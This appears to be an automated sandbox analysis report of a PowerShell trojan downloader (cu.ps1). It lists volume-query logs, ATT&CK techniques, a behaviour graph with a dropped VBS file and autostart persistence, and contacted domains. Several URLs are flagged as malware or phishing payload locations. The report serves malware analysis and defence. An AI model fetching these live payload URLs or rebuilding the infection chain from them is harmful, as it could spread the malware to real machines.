          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information111
          Scripting          		Valid Accounts12
          Command and Scripting Interpreter          		111
          Scripting          		11
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          Security Software Discovery          		Remote ServicesData from Local System1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Exploitation for Client Execution          		1
          Registry Run Keys / Startup Folder          		1
          Registry Run Keys / Startup Folder          		21
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Process Discovery          		Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts3
          PowerShell          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		11
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared Drive3
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture14
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          DLL Side-Loading          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1568998 Sample: cu.ps1 Startdate: 05/12/2024 Architecture: WINDOWS Score: 100 30 www.fornid.com 2->30 32 fornid.com 2->32 34 5 other IPs or domains 2->34 44 Antivirus detection for URL or domain 2->44 46 Antivirus / Scanner detection for submitted sample 2->46 48 Multi AV Scanner detection for submitted file 2->48 50 7 other signatures 2->50 9 powershell.exe 16 23 2->9         started        signatures3 process4 dnsIp5 40 fornid.com 93.95.216.175, 443, 49709 SERVERPLAN-ASIT Italy 9->40 42 www.pineappletech.ae 91.193.42.13, 443, 49710 ITFPL Belgium 9->42 28 C:\Users\Public\tq5.vbs, ASCII 9->28 dropped 52 Powershell creates an autostart link 9->52 14 wscript.exe 1 9->14         started        17 powershell.exe 23 9->17         started        19 conhost.exe 9->19         started        file6 signatures7 process8 signatures9 54 Suspicious powershell command line found 14->54 56 Wscript starts Powershell (via cmd or directly) 14->56 58 Obfuscated command line found 14->58 62 2 other signatures 14->62 21 powershell.exe 29 14->21         started        60 Loading BitLocker PowerShell Module 17->60 process10 dnsIp11 36 erp-royal-crown.info 148.251.114.233, 443, 49713, 49716 HETZNER-ASDE Germany 21->36 38 almrwad.com 184.171.244.231, 443, 49711, 49712 DIMENOCUS United States 21->38 24 conhost.exe 21->24         started        26 cmd.exe 1 21->26         started        process12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          cu.ps132%ReversingLabsScript-PowerShell.Trojan.PShell
          cu.ps1100%AviraTR/PShell.Dldr.VPA

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://www.fornid.com/ordine0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordine0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Su0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordineren100%Avira URL Cloudphishing
          https://www.fornid.com/wh/List0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerend100%Avira URL Cloudphishing
          https://www.almrwad.com/w0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordiner0%Avira URL Cloudsafe
          https://www.almrwad.com/0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerende100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info100%Avira URL Cloudphishing
          http://www.erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.almrwad.c0%Avira URL Cloudsafe
          https://www.fornid.com/133-occhiali-protettivi0%Avira URL Cloudsafe
          https://www.erp-royal-crown.i0%Avira URL Cloudsafe
          http://www.pineappletech.ae0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordine100%Avira URL Cloudphishing
          https://www.pineappletech.ae/na/mg.vbs100%Avira URL Cloudmalware
          https://www.fornid.com/themes/PRS070158/css/megnor/custom.css0%Avira URL Cloudsafe
          https://www.fornid.com/90-maschere-per-saldatura0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordin0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/100%Avira URL Cloudphishing
          https://www.fornid.com/wh/List%20of%20rznvquirznvd%20itznvms%20and%20sznvrvicznvs.pdf0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smip100%Avira URL Cloudphishing
          https://www.fornid.com/contattaci0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subord0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes70%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/0%Avira URL Cloudsafe
          https://www.almrwad.com0%Avira URL Cloudsafe
          https://go.micro0%Avira URL Cloudsafe
          https://www.fornid.com0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerende0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.s0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.sm0%Avira URL Cloudsafe
          https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdf100%Avira URL Cloudmalware
          http://www.fornid.com/0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes780%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subord100%Avira URL Cloudphishing
          http://almrwad.com0%Avira URL Cloudsafe
          https://www.fornid.com/144-filtri-per-maschere0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/w100%Avira URL Cloudphishing
          https://www.fornid.com/62-mascherine-protettive-ffp1-ffp2-ffp30%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
          https://www.erp-royal-crown.0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.smi100%Avira URL Cloudmalware
          https://www.fornid.com/314-scarpe-antinfortunistiche-e-stivale-da-lavoro0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh100%Avira URL Cloudphishing
          http://fornid.com0%Avira URL Cloudsafe
          https://www.fornid.com/sitemap0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinere100%Avira URL Cloudphishing
          https://www.fornid.com/145-maschere-antigas0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subor100%Avira URL Cloudphishing
          https://www.erp-royal-crown.info/wh/Subordi100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordinerend0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subo100%Avira URL Cloudphishing
          https://www.fornid.com/il-mio-account0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinere0%Avira URL Cloudsafe
          http://www.almrwad.com0%Avira URL Cloudsafe
          https://www.erp-royal-crown.in0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subordinerendes78.0%Avira URL Cloudsafe
          https://www.almrwad.co0%Avira URL Cloudsafe
          http://erp-royal-crown.info100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordi0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes100%Avira URL Cloudphishing
          https://www.pinznvapplznvtznvch.aznv/na/mg.vbs0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78.s100%Avira URL Cloudphishing
          https://www.fornid.com/img/logo.jpg0%Avira URL Cloudsafe
          https://www.almrwad.com/wh0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Sub0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordin100%Avira URL Cloudphishing
          http://blog.fornid.com/0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes78100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subo0%Avira URL Cloudsafe
          http://www.fornid.com/content/13-international-shipments0%Avira URL Cloudsafe
          https://www.almrwad.com/wh/Subor0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Su0100%Avira URL Cloudphishing
          https://www.almrwad.0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/wh/Subordinerendes7100%Avira URL Cloudphishing
          http://www.fornid.com0%Avira URL Cloudsafe
          https://www.fornid.com/cerca0%Avira URL Cloudsafe
          https://www.erp-royal-crown.info/100%Avira URL Cloudphishing
          https://www.almrwad.com/wh/Subordineren0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          erp-royal-crown.info
          		148.251.114.233
          		truefalse
            		unknown
            almrwad.com
            		184.171.244.231
            		truefalse
              		unknown
              fornid.com
              		93.95.216.175
              		truetrue
                		unknown
                www.pineappletech.ae
                		91.193.42.13
                		truefalse
                  		unknown
                  www.fornid.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.almrwad.com
                    		unknown
                    		unknownfalse
                      		unknown
                      www.erp-royal-crown.info
                      		unknown
                      		unknownfalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://www.pineappletech.ae/na/mg.vbsfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdffalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.erp-royal-crown.info/wh/Subordinerendes78.smitrue
                        • Avira URL Cloud: malware
                        		unknown
                        https://www.almrwad.com/wh/Subordinerendes78.smifalse
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.almrwad.com/wpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/ordinepowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinepowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.almrwad.com/wh/Subordinerpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.fornid.com/wh/Listpowershell.exe, 00000000.00000002.1669645213.0000022A14252000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.microsoft.copowershell.exe, 00000000.00000002.1737765751.0000022A2ADB0000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://www.almrwad.com/wh/Supowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerenpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendepowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.com/powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.info/wh/Subordinerendpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.erp-royal-crown.infopowershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.almrwad.cpowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://www.erp-royal-crown.infopowershell.exe, 00000007.00000002.2653474547.000002251FCF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251EFAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F2ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FC05000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F1F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251FEF4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.000002251F9B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: phishing
                          		unknown
                          https://www.fornid.com/90-maschere-per-saldaturapowershell.exe, 00000000.00000002.1669645213.0000022A14730000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1729316042.0000022A22C8F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1729316042.0000022A22DD2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1547285590.000002A61006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EA9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2743521529.000002252EBE1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://www.erp-royal-crown.info/wh/Subordinepowershell.exe, 00000007.00000002.2653474547.0000022520118000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: phishing
                            		unknown
